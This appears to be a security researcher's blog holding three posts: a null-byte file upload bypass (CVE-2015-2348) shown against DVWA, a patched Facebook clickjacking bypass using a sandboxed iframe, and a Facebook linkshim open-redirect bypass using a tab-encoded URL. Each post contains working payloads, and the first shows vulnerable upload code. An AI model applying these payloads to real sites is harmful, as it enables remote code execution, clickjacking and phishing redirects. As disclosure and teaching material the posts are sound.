findings

Exploiting PHP Upload forms with CVE-2015-2348

4:06 AM

Today I would like to post about a recent bug I have found in PHP, CVE-2015-2348.
This bug is fairly severe, considering the number of developers and packages affected.
I have to admit that checking the file extension and declaring a file safe can still leave many
other security issues open. However, defending against this exact vulnerability in your own code
is pretty unrealistic: it passes the Content-Type, extension, MIME-type and size checks, so none
of them will save you from this.

The issue occurs in the very popular move_uploaded_file() PHP function that is used to handle
user-uploaded files. This function checks that the file designated by filename is a valid
upload file (meaning that it was uploaded via PHP's HTTP POST upload mechanism). If the file
is valid, it is moved to the filename given by destination.

Example:

move_uploaded_file ( string $filename , string $destination )
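In a typical upload handler it is used along these lines (a generic sketch of my own; the field
name "uploaded" and the target directory are just assumptions for illustration):

<?php
// Minimal example of the usual pattern: take the client-supplied name,
// build a destination path, and let move_uploaded_file() place the file there.
$target_path = '/var/www/uploads/' . basename($_FILES['uploaded']['name']);

if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
    echo 'Stored at ' . htmlspecialchars($target_path);
} else {
    echo 'Not a valid uploaded file.';
}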

The problem with it is that there is a way to insert null bytes (an issue fixed multiple times
before, e.g. CVE-2006-7243). Using the null-byte character \x00, an attacker can convince an
upload form that a file has passed the extension checks and is safe and valid, and then upload
malicious files that can lead to RCE.

I am going to take DVWA as an example here. DVWA's highest level is meant to be unbreakable
for a number of issues; the high-level upload box is meant to teach developers the safe way of
handling an upload. Let's exploit exactly that.

Here is the code snippet from https://github.com/RandomStorm/DVWA/blob/master/vulnerabilities/upload/source/high.php:

$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];

if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" ||
    $uploaded_ext == "JPEG") && ($uploaded_size < 100000)) {

    if (!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
        $html .= '<pre>';
        $html .= 'Your image was not uploaded.';
        $html .= '</pre>';
    }
    else {
        $html .= '<pre>' . $target_path . ' succesfully uploaded!</pre>';
        // ...
    }

Yes, this is vulnerable to a number of exploits (like XSCH, XSS and more), but not to RCE,
because null bytes in paths have been rejected since PHP 5.3.1. The problem with DVWA is that it
passes the user-provided name into move_uploaded_file()'s destination ($target_path). The expected
behavior would be for PHP, given:

move_uploaded_file($_FILES['uploaded']['tmp_name'], "/file.php\x00.jpg")

to create the file "file.php\x00.jpg".

In reality, it creates: file.php
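To make that concrete, here is a tiny illustration of my own (not part of DVWA), reusing the same
substr/strrpos extension logic as the snippet above:

<?php
// How the whitelist check and a null-byte-truncating move_uploaded_file()
// see the same attacker-controlled name differently.
$uploaded_name = "file.php\x00.jpg";    // name sent in the multipart request

// DVWA-style extension check: everything after the last dot.
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
var_dump($uploaded_ext);                // string(3) "jpg" -> passes the whitelist

// On vulnerable PHP versions the destination path is cut at the first NUL byte,
// so the file that actually lands on disk is:
var_dump(substr($uploaded_name, 0, strpos($uploaded_name, "\0")));  // "file.php"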

This clearly bypasses the extension check. It has been proven many times that the GD library
checks ( getimagesize(), imagecreatefromjpeg()... ) can also be defeated;
read this post by @secgeek for example.

Now, even if you have done multiple checks, it is highly unlikely that you blacklisted the
character \x00, so most upload forms running on PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x
before 5.6.7 are vulnerable to this particular attack.
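As a stop-gap while you patch (my own suggestion, not part of the original advisory), you can at
least refuse any upload whose client-supplied name contains a NUL byte before it ever reaches the
destination path:

<?php
// Defensive sketch: the field name "uploaded" and the target directory are
// assumptions for illustration, not anyone's exact code.
$target_dir  = '/var/www/uploads/';
$client_name = isset($_FILES['uploaded']['name']) ? $_FILES['uploaded']['name'] : '';

if (strpos($client_name, "\0") !== false) {
    die('Invalid file name.');
}

$destination = $target_dir . basename($client_name);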

Closing:

If you are on a vulnerable server, update!

bugbounty

Facebook Bug Bounty: Clickjacking

10:14 AM



Note: this is a guest post from a friend, Sahad Nk, about his recently patched Facebook clickjacking bug.

According to OWASP: 

We frame a certain website A within an iframe and, using stylesheets, make it invisible/hidden (while it still exists in the background), then reconstruct another site on top of it. So while you think you are clicking something on the attacker-controlled site, I can actually make you click a button in the framed website.

The Exploit:

The exploit is really simple and effective. Facebook defends against clickjacking in two ways, one acting as a fallback for the other. The first is a technique called frame-busting (using JavaScript to deny framing requests). On interfaces without JS support, it sends X-Frame-Options (XFO), not as an HTTP header, but in a meta tag wrapped in a <noscript> tag:

<noscript><meta http-equiv="X-Frame-Options" content="deny"></noscript>

Meta tags that attempt to apply the X-Frame-Options directive do not work: browsers ignore the directive when it is delivered in a meta tag, so <meta http-equiv="X-Frame-Options" content="deny"> does not defend against framing at all (tested in Firefox 35). X-Frame-Options must be applied as an actual HTTP response header. Facebook, however, still has the additional JS-based frame-busting.
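For comparison, the variant that does work everywhere is the real response header, for example in PHP (a generic illustration, not Facebook's implementation):

<?php
// Send X-Frame-Options as an actual HTTP response header, before any output.
header('X-Frame-Options: DENY');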

On interfaces which require JS support, it is possible to bypass the JS frame-busting by putting a sandbox attribute on the iframe, like:

<iframe id="clickjacking" src="https://iphone.facebook.com/dialog/feed?app_id=[APP ID]&picture=http://example.com/example.JPG&name=Test&description=This%20is%20a%20test&redirect_uri=http://example.com/" width="500" height="500" scrolling="no" frameborder="none" sandbox="allow-forms"></iframe>


Simple as that, it was possible to iframe Facebook and make you do any number of undesirable things. Here is a video demonstrating how seriously this exploit might have been abused:



Reported - March 20

Clarification - March 21
Fix & Bounty  - March 24

thanks,
Sahad Nk


bugbounty

Facebook: Another Linkshim Bypass

12:48 PM


I wasn't going to post about this, but then I thought it could make an interesting article, because this is the third vulnerability fixed in the same parameter, six months after the first.

You can find my initial linkshim bypass in this exact position, which later turned out to be an XSS, if you click here. In that first bug in the continue parameter, it was possible to bypass the linkshim and force a redirection to a site before it was checked, and that later turned into XSS.

First I am going to talk about a relevant and great technique I learned from prompt.ml XSS challenge 4; you can find the DOM XSS challenge here. Consider the code:

function escape(input) {
    // make sure the script belongs to own site
    // sample script: http://prompt.ml/js/test.js
    if (/^(?:https?:)?\/\/prompt\.ml\//i.test(decodeURIComponent(input))) {
        var script = document.createElement('script');
        script.src = input;
        return script.outerHTML;
    } else {
        return 'Invalid resource.';
    }
}

This is the JS source code of challenge 4. They basically want you to bypass a regex so that an external URL gets accepted. The main problem here is that the check runs on decodeURIComponent(input), i.e. on the input after URL decoding, while the raw input is what ends up in script.src. We can trick the browser into believing the prompt.ml domain (allowed by the regex) is part of our URL by using HTTP auth credentials, as in http://prompt.ml@attacker.com: that URL actually points to attacker.com while still containing prompt.ml. The regex, however, also requires a / right after prompt.ml.

To get that slash past the check, we simply use %2f, the URL-encoded representation of /: decodeURIComponent() turns it into the slash the regex needs, while the browser still treats prompt.ml%2f as credentials. And our bypass is:
//prompt.ml%2f@á„’.ws/
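To make the underlying mistake explicit, here is a rough PHP analogue of the same decode-then-validate pattern (my own sketch, not code from prompt.ml or Facebook; attacker.example is a placeholder domain):

<?php
// Flawed pattern: validate the decoded value, but hand the raw value to the browser.
function is_allowed($input) {
    // Same idea as the challenge regex: must look like a prompt.ml URL.
    return (bool) preg_match('~^(?:https?:)?//prompt\.ml/~i', rawurldecode($input));
}

$payload = '//prompt.ml%2f@attacker.example';

var_dump(is_allowed($payload));   // bool(true): %2f decodes to "/" and the regex matches
// A browser given the raw value treats "prompt.ml%2f" as userinfo credentials
// and actually fetches the script from attacker.example.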

The trick to solving the level with only 17 characters lies hidden in a transformation behavior some browsers apply when converting Unicode characters to URLs: a certain range of characters resolves to three other characters, one of which is a dot - the dot we need for the URL. The following vector uses the domain 14.rs, which can be expressed by two characters only.

A URL that starts with two forward slashes is protocol-relative: browsers treat it as absolute and resolve it against another host, while naive server-side code may treat it as a relative path. Something similar seems to happen server-side with the continue parameter: any absolute URL given there is sent to the linkshim for a check before the external redirection, which means https://m.facebook.com/feed_menu/?story_fbid=808015282566492&id=100000740832129&confirm=h&continue=http://evilzone.org gets flagged as malicious.

Now, a stupid enough URL validator will consider //evilzone.org a relative location and won't send it to the linkshim, letting us create a hyperlink like <a href="//evilzone.org"> - but FB did blacklist //. The next try is \/evilzone.org: since most browsers normalize \ back to /, this usually bypasses the check and still ends up as //evilzone.org.

But both // and \/ got caught. At this point I concluded that the linkshim uses a number of blacklist-based checks covering \\, //, and \/, and I started fuzzing.

I was then talking to @FransRosen and he mentioned a technique that could still produce another bypass: \%09/@site.com
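To see why this slips through a blacklist like the one above, here is a rough PHP sketch (my own illustration, not Facebook's actual code):

<?php
// What the server sees once %09 is decoded: backslash, TAB, slash.
$continue = "\\\t/@evilzone.org";
$banned   = ['//', '\\/', '\\\\'];           // the pairs the linkshim was catching

$blocked = false;
foreach ($banned as $needle) {
    if (strpos($continue, $needle) !== false) {
        $blocked = true;
    }
}
var_dump($blocked);   // bool(false): the TAB splits every banned pair

// Browsers strip TAB/CR/LF inside URLs and treat "\" like "/", so the value
// the victim actually follows collapses back to a protocol-relative URL:
$effective = str_replace(["\t", "\r", "\n"], '', $continue);
$effective = str_replace('\\', '/', $effective);
var_dump($effective); // "//@evilzone.org"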

The payload \%09/@site.com is basically equivalent to //@site.com: their banlist didn't contain \%09/, \%0D/ or \%0A/, so the check passes, and the %09 (a tab character) gets ignored when the URL is parsed, which brings // back. We can keep adding as many of these in between. And the complete linkshim bypass will look something like:




Feb 1, 2015 6:33am - Initial Report
Feb 1, 2015 6:47am - More Clarification sent
Feb 2, 2015 6:11am - More clarification asked
Feb 3, 2015 1:04pm - Some more clarifications sent
Feb 4, 2015 11:25am - Escalation of bug    
Feb 23, 2015 11:00am - Bug Fixed
  
Thank you for reading! :-)